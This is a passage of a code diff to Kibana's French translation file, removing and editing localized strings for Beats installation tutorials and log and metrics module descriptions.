fichier ''heartbeat.yml''.", "home.tutorials.common.heartbeatEnableOnPremInstructions.rpmTextPre": "Modifiez le paramètre ''heartbeat.monitors'' dans le fichier ''heartbeat.yml''.", "home.tutorials.common.heartbeatEnableOnPremInstructions.windowsTextPre": "Modifiez le paramètre ''heartbeat.monitors'' dans le fichier ''heartbeat.yml''.", - "home.tutorials.common.heartbeatInstructions.config.debTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.heartbeatInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.heartbeatInstructions.config.debTitle": "Modifier la configuration", - "home.tutorials.common.heartbeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.heartbeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.heartbeatInstructions.config.osxTitle": "Modifier la configuration", - "home.tutorials.common.heartbeatInstructions.config.rpmTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n> **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.heartbeatInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.heartbeatInstructions.config.rpmTitle": "Modifier la configuration", - "home.tutorials.common.heartbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.heartbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.heartbeatInstructions.config.windowsTitle": "Modifier la configuration", - "home.tutorials.common.heartbeatInstructions.install.debTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({link}).", - "home.tutorials.common.heartbeatInstructions.install.debTextPre": "Vous utilisez Heartbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", "home.tutorials.common.heartbeatInstructions.install.debTitle": "Télécharger et installer Heartbeat", - "home.tutorials.common.heartbeatInstructions.install.osxTextPre": "Vous utilisez Heartbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", "home.tutorials.common.heartbeatInstructions.install.osxTitle": "Télécharger et installer Heartbeat", - "home.tutorials.common.heartbeatInstructions.install.rpmTextPre": "Vous utilisez Heartbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", "home.tutorials.common.heartbeatInstructions.install.rpmTitle": "Télécharger et installer Heartbeat", - "home.tutorials.common.heartbeatInstructions.install.windowsTextPre": "Vous utilisez Heartbeat pour la première fois ? Consultez le [guide de démarrage rapide]({heartbeatLink}).\n 1. Téléchargez le fichier .zip Heartbeat pour Windows via la page [Télécharger]({elasticLink}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Heartbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Heartbeat en tant que service Windows.", "home.tutorials.common.heartbeatInstructions.install.windowsTitle": "Télécharger et installer Heartbeat", "home.tutorials.common.heartbeatInstructions.start.debTextPre": "La commande ''setup'' charge le modèle d'indexation Kibana.", "home.tutorials.common.heartbeatInstructions.start.debTitle": "Lancer Heartbeat", @@ -4161,56 +3396,25 @@ "home.tutorials.common.heartbeatStatusCheck.successText": "Des données ont été reçues de Heartbeat.", "home.tutorials.common.heartbeatStatusCheck.text": "Vérifier que des données sont reçues de Heartbeat", "home.tutorials.common.heartbeatStatusCheck.title": "Statut de Heartbeat", - "home.tutorials.common.logstashInstructions.install.java.osxTextPre": "Suivez les instructions d'installation [ici]({link}).", "home.tutorials.common.logstashInstructions.install.java.osxTitle": "Télécharger et installer l'environnement d'exécution Java", - "home.tutorials.common.logstashInstructions.install.java.windowsTextPre": "Suivez les instructions d'installation [ici]({link}).", "home.tutorials.common.logstashInstructions.install.java.windowsTitle": "Télécharger et installer l'environnement d'exécution Java", - "home.tutorials.common.logstashInstructions.install.logstash.osxTextPre": "Vous utilisez Logstash pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", "home.tutorials.common.logstashInstructions.install.logstash.osxTitle": "Télécharger et installer Logstash", - "home.tutorials.common.logstashInstructions.install.logstash.windowsTextPre": "Vous utilisez Logstash pour la première fois ? Consultez le [guide de démarrage rapide]({logstashLink}).\n 1. [Téléchargez]({elasticLink}) le fichier .zip Logstash pour Windows.\n 2. Extrayez le contenu du fichier compressé.", "home.tutorials.common.logstashInstructions.install.logstash.windowsTitle": "Télécharger et installer Logstash", "home.tutorials.common.metricbeat.cloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.metricbeat.premCloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.metricbeat.premInstructions.gettingStarted.title": "Commencer", - "home.tutorials.common.metricbeatCloudInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.metricbeatCloudInstructions.config.debTitle": "Modifier la configuration", - "home.tutorials.common.metricbeatCloudInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.metricbeatCloudInstructions.config.osxTitle": "Modifier la configuration", - "home.tutorials.common.metricbeatCloudInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.metricbeatCloudInstructions.config.rpmTitle": "Modifier la configuration", - "home.tutorials.common.metricbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.metricbeatCloudInstructions.config.windowsTitle": "Modifier la configuration", - "home.tutorials.common.metricbeatEnableInstructions.debTextPost": "Modifiez les paramètres dans le fichier ''/etc/metricbeat/modules.d/{moduleName}.yml''.", - "home.tutorials.common.metricbeatEnableInstructions.debTitle": "Activer et configurer le module {moduleName}", - "home.tutorials.common.metricbeatEnableInstructions.osxTextPost": "Modifiez les paramètres dans le fichier ''modules.d/{moduleName}.yml''.", - "home.tutorials.common.metricbeatEnableInstructions.osxTextPre": "Dans le répertoire d'installation, exécutez la commande suivante :", - "home.tutorials.common.metricbeatEnableInstructions.osxTitle": "Activer et configurer le module {moduleName}", - "home.tutorials.common.metricbeatEnableInstructions.rpmTextPost": "Modifiez les paramètres dans le fichier ''/etc/metricbeat/modules.d/{moduleName}.yml''.", - "home.tutorials.common.metricbeatEnableInstructions.rpmTitle": "Activer et configurer le module {moduleName}", - "home.tutorials.common.metricbeatEnableInstructions.windowsTextPost": "Modifiez les paramètres dans le fichier ''modules.d/{moduleName}.yml''.", - "home.tutorials.common.metricbeatEnableInstructions.windowsTextPre": "Dans le dossier {path}, exécutez la commande suivante :", - "home.tutorials.common.metricbeatEnableInstructions.windowsTitle": "Activer et configurer le module {moduleName}", - "home.tutorials.common.metricbeatInstructions.config.debTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.metricbeatInstructions.config.debTextPre": "Modifiez {path} afin de définir les informations de connexion :", + "home.tutorials.common.metricbeatEnableInstructions.osxTextPre": "Dans le répertoire d'installation, exécutez la commande suivante :", "home.tutorials.common.metricbeatInstructions.config.debTitle": "Modifier la configuration", - "home.tutorials.common.metricbeatInstructions.config.osxTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.metricbeatInstructions.config.osxTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.metricbeatInstructions.config.osxTitle": "Modifier la configuration", - "home.tutorials.common.metricbeatInstructions.config.rpmTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.metricbeatInstructions.config.rpmTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.metricbeatInstructions.config.rpmTitle": "Modifier la configuration", - "home.tutorials.common.metricbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.metricbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.metricbeatInstructions.config.windowsTitle": "Modifier la configuration", - "home.tutorials.common.metricbeatInstructions.install.debTextPost": "Vous cherchez les packages 32 bits ? Consultez la [page de téléchargement]({link}).", - "home.tutorials.common.metricbeatInstructions.install.debTextPre": "Vous utilisez Metricbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", "home.tutorials.common.metricbeatInstructions.install.debTitle": "Télécharger et installer Metricbeat", - "home.tutorials.common.metricbeatInstructions.install.osxTextPre": "Vous utilisez Metricbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", "home.tutorials.common.metricbeatInstructions.install.osxTitle": "Télécharger et installer Metricbeat", - "home.tutorials.common.metricbeatInstructions.install.rpmTextPre": "Vous utilisez Metricbeat pour la première fois ? Consultez le [guide de démarrage rapide]({link}).", "home.tutorials.common.metricbeatInstructions.install.rpmTitle": "Télécharger et installer Metricbeat", - "home.tutorials.common.metricbeatInstructions.install.windowsTextPost": "Modifiez les paramètres sous ''output.elasticsearch'' dans le fichier {path} afin de pointer vers votre installation Elasticsearch.", - "home.tutorials.common.metricbeatInstructions.install.windowsTextPre": "Vous utilisez Metricbeat pour la première fois ? Consultez le [guide de démarrage rapide]({metricbeatLink}).\n 1. Téléchargez le fichier .zip Metricbeat pour Windows via la page [Télécharger]({elasticLink}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Metricbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Metricbeat en tant que service Windows.", "home.tutorials.common.metricbeatInstructions.install.windowsTitle": "Télécharger et installer Metricbeat", "home.tutorials.common.metricbeatInstructions.start.debTextPre": "La commande ''setup'' charge les tableaux de bord Kibana. Si les tableaux de bord sont déjà configurés, omettez cette commande.", "home.tutorials.common.metricbeatInstructions.start.debTitle": "Lancer Metricbeat", @@ -4223,22 +3427,14 @@ "home.tutorials.common.metricbeatStatusCheck.buttonLabel": "Vérifier les données", "home.tutorials.common.metricbeatStatusCheck.errorText": "Aucune donnée n'a encore été reçue de ce module.", "home.tutorials.common.metricbeatStatusCheck.successText": "Des données ont été reçues de ce module.", - "home.tutorials.common.metricbeatStatusCheck.text": "Vérifier que des données sont reçues du module Metricbeat \"{moduleName}\"", "home.tutorials.common.metricbeatStatusCheck.title": "Statut du module", - "home.tutorials.common.premCloudInstructions.option1.textPre": "Rendez-vous sur [Elastic Cloud]({link}). Enregistrez-vous si vous n'avez pas encore de compte. Un essai gratuit de 14 jours est disponible.\n\nConnectez-vous à la console Elastic Cloud.\n\nPour créer un cluster, dans la console Elastic Cloud :\n 1. Sélectionnez **Créer un déploiement** et spécifiez le **Nom du déploiement**.\n 2. Modifiez les autres options de déploiement selon les besoins (sinon, les valeurs par défaut sont très bien pour commencer).\n 3. Cliquer sur **Créer un déploiement**\n 4. Attendre la fin de la création du déploiement\n 5. Accéder à la nouvelle instance cloud Kibana et suivre les instructions de la page d'accueil de Kibana", - "home.tutorials.common.premCloudInstructions.option1.title": "Option 1 : essayer dans Elastic Cloud", - "home.tutorials.common.premCloudInstructions.option2.textPre": "Si vous exécutez cette instance Kibana sur une instance Elasticsearch hébergée, passez à la configuration manuelle.\n\nEnregistrez le point de terminaison **Elasticsearch** en tant que {urlTemplate} et le cluster **Mot de passe** en tant que {passwordTemplate} pour les conserver.", - "home.tutorials.common.premCloudInstructions.option2.title": "Option 2 : connecter un Kibana local à une instance cloud", + "home.tutorials.common.premCloudInstructions.option1.title": "Option 1 : essayer dans Elastic Cloud", + "home.tutorials.common.premCloudInstructions.option2.title": "Option 2 : connecter un Kibana local à une instance cloud", "home.tutorials.common.winlogbeat.cloudInstructions.gettingStarted.title": "Premiers pas", "home.tutorials.common.winlogbeat.premCloudInstructions.gettingStarted.title": "Commencer", "home.tutorials.common.winlogbeat.premInstructions.gettingStarted.title": "Commencer", - "home.tutorials.common.winlogbeatCloudInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion pour Elastic Cloud :", "home.tutorials.common.winlogbeatCloudInstructions.config.windowsTitle": "Modifier la configuration", - "home.tutorials.common.winlogbeatInstructions.config.windowsTextPostMarkdown": "Où {passwordTemplate} est le mot de passe de l'utilisateur \"elastic\", {esUrlTemplate} est l'URL d'Elasticsearch et {kibanaUrlTemplate} est l'URL de Kibana. Pour [configurer le SSL]({configureSslUrl}) avec le certificat par défaut généré par Elasticsearch, ajoutez son empreinte digitale dans {esCertFingerprintTemplate}.\n\n > **_Important :_** n'utilisez pas l'utilisateur \"elastic\" intégré pour sécuriser les clients dans un environnement de production. À la place, configurez des utilisateurs autorisés ou des clés d'API, et n'exposez pas les mots de passe dans les fichiers de configuration. [Learn more]({linkUrl}).", - "home.tutorials.common.winlogbeatInstructions.config.windowsTextPre": "Modifiez {path} afin de définir les informations de connexion :", "home.tutorials.common.winlogbeatInstructions.config.windowsTitle": "Modifier la configuration", - "home.tutorials.common.winlogbeatInstructions.install.windowsTextPost": "Modifiez les paramètres sous \"output.elasticsearch\" dans le fichier {path} afin de pointer vers votre installation Elasticsearch.", - "home.tutorials.common.winlogbeatInstructions.install.windowsTextPre": "Vous utilisez Winlogbeat pour la première fois ? Consultez le [guide de démarrage rapide]({winlogbeatLink}).\n 1. Téléchargez le fichier .zip Winlogbeat pour Windows via la page [Télécharger]({elasticLink}).\n 2. Extrayez le contenu du fichier compressé sous {folderPath}.\n 3. Renommez le répertoire \"{directoryName}\" en \"Winlogbeat\".\n 4. Ouvrez une invite PowerShell en tant qu'administrateur (faites un clic droit sur l'icône PowerShell et sélectionnez **Exécuter en tant qu'administrateur**). Si vous exécutez Windows XP, vous devrez peut-être télécharger et installer PowerShell.\n 5. Dans l'invite PowerShell, exécutez les commandes suivantes afin d'installer Winlogbeat en tant que service Windows.", "home.tutorials.common.winlogbeatInstructions.install.windowsTitle": "Télécharger et installer Winlogbeat", "home.tutorials.common.winlogbeatInstructions.start.windowsTextPre": "La commande \"setup\" charge les tableaux de bord Kibana. Si les tableaux de bord sont déjà configurés, omettez cette commande.", "home.tutorials.common.winlogbeatInstructions.start.windowsTitle": "Lancer Winlogbeat", @@ -4248,425 +3444,350 @@ "home.tutorials.common.winlogbeatStatusCheck.text": "Vérifier que des données sont reçues de Winlogbeat", "home.tutorials.common.winlogbeatStatusCheck.title": "Statut du module", "home.tutorials.consulMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Consul", - "home.tutorials.consulMetrics.longDescription": "Le module Metricbeat \"consul\" récupère des indicateurs depuis Consul. [En savoir plus]({learnMoreLink}).", "home.tutorials.consulMetrics.nameTitle": "Indicateurs Consul", "home.tutorials.consulMetrics.shortDescription": "Collectez les indicateurs à partir des serveurs Consul avec Metricbeat.", "home.tutorials.corednsLogs.artifacts.dashboards.linkLabel": "Aperçu de [Filebeat CoreDNS]", - "home.tutorials.corednsLogs.longDescription": "Il s'agit d'un module Filebeat pour CoreDNS. Celui-ci prend en charge les déploiements CoreDNS autonomes et les déploiements CoreDNS dans Kubernetes. [En savoir plus]({learnMoreLink}).", "home.tutorials.corednsLogs.nameTitle": "Logs CoreDNS", "home.tutorials.corednsLogs.shortDescription": "Collectez et analysez les logs à partir des serveurs CoreDNS avec Filebeat.", "home.tutorials.corednsMetrics.artifacts.application.label": "Découverte", - "home.tutorials.corednsMetrics.longDescription": "Le module Metricbeat \"coredns\" récupère des indicateurs depuis CoreDNS. [En savoir plus]({learnMoreLink}).", "home.tutorials.corednsMetrics.nameTitle": "Indicateurs CoreDNS", "home.tutorials.corednsMetrics.shortDescription": "Collectez les indicateurs à partir des serveurs CoreDNS avec Metricbeat.", "home.tutorials.couchbaseMetrics.artifacts.application.label": "Découverte", - "home.tutorials.couchbaseMetrics.longDescription": "Le module Metricbeat \"couchbase\" récupère des indicateurs depuis Couchbase. [En savoir plus]({learnMoreLink}).", "home.tutorials.couchbaseMetrics.nameTitle": "Indicateurs Couchbase", "home.tutorials.couchbaseMetrics.shortDescription": "Collectez les indicateurs à partir des bases de données Couchbase avec Metricbeat.", "home.tutorials.couchdbMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs CouchDB", - "home.tutorials.couchdbMetrics.longDescription": "Le module Metricbeat \"couchdb\" récupère des indicateurs depuis CouchDB. [En savoir plus]({learnMoreLink}).", "home.tutorials.couchdbMetrics.nameTitle": "Indicateurs CouchDB", "home.tutorials.couchdbMetrics.shortDescription": "Collectez les indicateurs à partir des serveurs CouchDB avec Metricbeat.", "home.tutorials.crowdstrikeLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.crowdstrikeLogs.longDescription": "Il s'agit du module Filebeat pour CrowdStrike Falcon utilisant le [connecteur SIEM](https://www.crowdstrike.com/blog/tech-center/integrate-with-your-siem) Falcon. Ce module collecte ces données, les convertit en ECS et les ingère pour les afficher dans le SIEM. Par défaut, le connecteur SIEM Falcon génère les données d'événement de l'API de streaming Falcon au format JSON. [En savoir plus]({learnMoreLink}).", "home.tutorials.crowdstrikeLogs.nameTitle": "Logs CrowdStrike", "home.tutorials.crowdstrikeLogs.shortDescription": "Collectez et analysez les logs à partir de CrowdStrike Falcon à l'aide du Falcon SIEM Connector avec Filebeat.", "home.tutorials.cylanceLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.cylanceLogs.longDescription": "Ce module permet de recevoir des logs CylancePROTECT par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", "home.tutorials.cylanceLogs.nameTitle": "Logs CylancePROTECT", "home.tutorials.cylanceLogs.shortDescription": "Collectez et analysez les logs à partir de CylancePROTECT avec Filebeat.", "home.tutorials.dockerMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Docker", - "home.tutorials.dockerMetrics.longDescription": "Le module Metricbeat \"docker\" récupère des indicateurs depuis le serveur Docker. [En savoir plus]({learnMoreLink}).", "home.tutorials.dockerMetrics.nameTitle": "Indicateurs Docker", "home.tutorials.dockerMetrics.shortDescription": "Collectez les indicateurs à partir des conteneurs Docker avec Metricbeat.", "home.tutorials.dropwizardMetrics.artifacts.application.label": "Découverte", - "home.tutorials.dropwizardMetrics.longDescription": "Le module Metricbeat \"dropwizard\" récupère des indicateurs depuis l'application Java Dropwizard. [En savoir plus]({learnMoreLink}).", "home.tutorials.dropwizardMetrics.nameTitle": "Indicateurs Dropwizard", "home.tutorials.dropwizardMetrics.shortDescription": "Collectez les indicateurs à partir des applications Dropwizard Java avec Metricbeat.", "home.tutorials.elasticsearchLogs.artifacts.application.label": "Découverte", - "home.tutorials.elasticsearchLogs.longDescription": "Le module Filebeat \"elasticsearch\" analyse les logs créés par Elasticsearch. [En savoir plus]({learnMoreLink}).", "home.tutorials.elasticsearchLogs.nameTitle": "Logs Elasticsearch", "home.tutorials.elasticsearchLogs.shortDescription": "Collectez et analysez les logs à partir des clusters Elasticsearch avec Filebeat.", "home.tutorials.elasticsearchMetrics.artifacts.application.label": "Découverte", - "home.tutorials.elasticsearchMetrics.longDescription": "Le module Metricbeat \"elasticsearch\" récupère des indicateurs depuis Elasticsearch. [En savoir plus]({learnMoreLink}).", "home.tutorials.elasticsearchMetrics.nameTitle": "Indicateurs Elasticsearch", "home.tutorials.elasticsearchMetrics.shortDescription": "Collectez les indicateurs à partir de clusters Elasticsearch avec Metricbeat.", - "home.tutorials.envoyproxyLogs.artifacts.dashboards.linkLabel": "Aperçu d'Envoy Proxy", - "home.tutorials.envoyproxyLogs.longDescription": "Il s'agit d'un module Filebeat pour le log d'accès à Envoy Proxy (https://www.envoyproxy.io/docs/envoy/v1.10.0/configuration/access_log). Celui-ci prend en charge les déploiements autonomes et les déploiements Envoy Proxy dans Kubernetes. [Learn more]({learnMoreLink}).", - "home.tutorials.envoyproxyLogs.nameTitle": "Logs Envoy Proxy", + "home.tutorials.envoyproxyLogs.artifacts.dashboards.linkLabel": "Aperçu d'Envoy Proxy", + "home.tutorials.envoyproxyLogs.nameTitle": "Logs Envoy Proxy", "home.tutorials.envoyproxyLogs.shortDescription": "Collectez et analysez les logs à partir d'Envoy Proxy avec Filebeat.", - "home.tutorials.envoyproxyMetrics.longDescription": "Le module Metricbeat \"envoyproxy\" récupère des indicateurs depuis Envoy Proxy. [En savoir plus]({learnMoreLink}).", - "home.tutorials.envoyproxyMetrics.nameTitle": "Indicateurs Envoy Proxy", + "home.tutorials.envoyproxyMetrics.nameTitle": "Indicateurs Envoy Proxy", "home.tutorials.envoyproxyMetrics.shortDescription": "Collectez les indicateurs à partir d'Envoy Proxy avec Metricbeat.", "home.tutorials.etcdMetrics.artifacts.application.label": "Découverte", - "home.tutorials.etcdMetrics.longDescription": "Le module Metricbeat \"etcd\" récupère des indicateurs depuis Etcd. [En savoir plus]({learnMoreLink}).", "home.tutorials.etcdMetrics.nameTitle": "Indicateurs Etcd", "home.tutorials.etcdMetrics.shortDescription": "Collectez les indicateurs à partir des serveurs Etcd avec Metricbeat.", "home.tutorials.f5Logs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.f5Logs.longDescription": "Ce module permet de recevoir des logs Big-IP Access Policy Manager par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", - "home.tutorials.f5Logs.nameTitle": "Logs F5", + "home.tutorials.f5Logs.nameTitle": "Logs F5", "home.tutorials.f5Logs.shortDescription": "Collectez et analysez les logs à partir de F5 Big-IP Access Policy Manager avec Filebeat.", "home.tutorials.fortinetLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.fortinetLogs.longDescription": "Il s'agit d'un module pour les logs Fortinet FortiOS envoyés au format Syslog. [En savoir plus]({learnMoreLink}).", "home.tutorials.fortinetLogs.nameTitle": "Logs Fortinet", "home.tutorials.fortinetLogs.shortDescription": "Collectez et analysez les logs à partir de Fortinet FortiOS avec Filebeat.", "home.tutorials.gcpLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs d'audit", - "home.tutorials.gcpLogs.longDescription": "Il s'agit d'un module pour les logs Google Cloud. Il prend en charge la lecture des logs d'audit, de flux VPC et de pare-feu qui ont été exportés depuis Stackdriver dans un récepteur de rubriques Google Pub/Sub. [En savoir plus]({learnMoreLink}).", - "home.tutorials.gcpLogs.nameTitle": "Logs Google Cloud", + "home.tutorials.gcpLogs.nameTitle": "Logs Google Cloud", "home.tutorials.gcpLogs.shortDescription": "Collectez et analysez les logs à partir de Google Cloud Platform avec Filebeat.", - "home.tutorials.gcpMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Google Cloud", - "home.tutorials.gcpMetrics.longDescription": "Le module Metricbeat \"gcp\" récupère des indicateurs depuis Google Cloud Platform à l'aide de l'API de monitoring Stackdriver. [En savoir plus]({learnMoreLink}).", - "home.tutorials.gcpMetrics.nameTitle": "Indicateurs Google Cloud", + "home.tutorials.gcpMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Google Cloud", + "home.tutorials.gcpMetrics.nameTitle": "Indicateurs Google Cloud", "home.tutorials.gcpMetrics.shortDescription": "Collectez les indicateurs à partir de Google Cloud Platform avec Metricbeat.", "home.tutorials.golangMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Golang", - "home.tutorials.golangMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis une application Golang. [En savoir plus]({learnMoreLink}).", "home.tutorials.golangMetrics.nameTitle": "Indicateurs Golang", "home.tutorials.golangMetrics.shortDescription": "Collectez les indicateurs à partir d'applications Golang avec Metricbeat.", "home.tutorials.gsuiteLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.gsuiteLogs.longDescription": "Il s'agit d'un module pour l'ingestion de données depuis les différentes API de rapports d'audit GSuite. [En savoir plus]({learnMoreLink}).", "home.tutorials.gsuiteLogs.nameTitle": "Logs GSuite", "home.tutorials.gsuiteLogs.shortDescription": "Collectez et analysez les rapports d'activité à partir de GSuite avec Filebeat.", "home.tutorials.haproxyLogs.artifacts.dashboards.linkLabel": "Aperçu de HAProxy", - "home.tutorials.haproxyLogs.longDescription": "Le module collecte et analyse les logs d'un processus (\"haproxy\") [En savoir plus]({learnMoreLink}).", "home.tutorials.haproxyLogs.nameTitle": "Logs HAProxy", "home.tutorials.haproxyLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs HAProxy avec Filebeat.", "home.tutorials.haproxyMetrics.artifacts.application.label": "Découverte", - "home.tutorials.haproxyMetrics.longDescription": "Le module Metricbeat \"haproxy\" récupère des indicateurs depuis HAProxy. [En savoir plus]({learnMoreLink}).", "home.tutorials.haproxyMetrics.nameTitle": "Indicateurs HAProxy", "home.tutorials.haproxyMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs HAProxy avec Metricbeat.", - "home.tutorials.ibmmqLogs.artifacts.dashboards.linkLabel": "Événements IBM MQ", - "home.tutorials.ibmmqLogs.longDescription": "Collectez des logs IBM MQ avec Filebeat. [En savoir plus]({learnMoreLink}).", - "home.tutorials.ibmmqLogs.nameTitle": "Logs IBM MQ", + "home.tutorials.ibmmqLogs.artifacts.dashboards.linkLabel": "Événements IBM MQ", + "home.tutorials.ibmmqLogs.nameTitle": "Logs IBM MQ", "home.tutorials.ibmmqLogs.shortDescription": "Collectez et analysez les logs à partir d'IBM MQ avec Filebeat.", 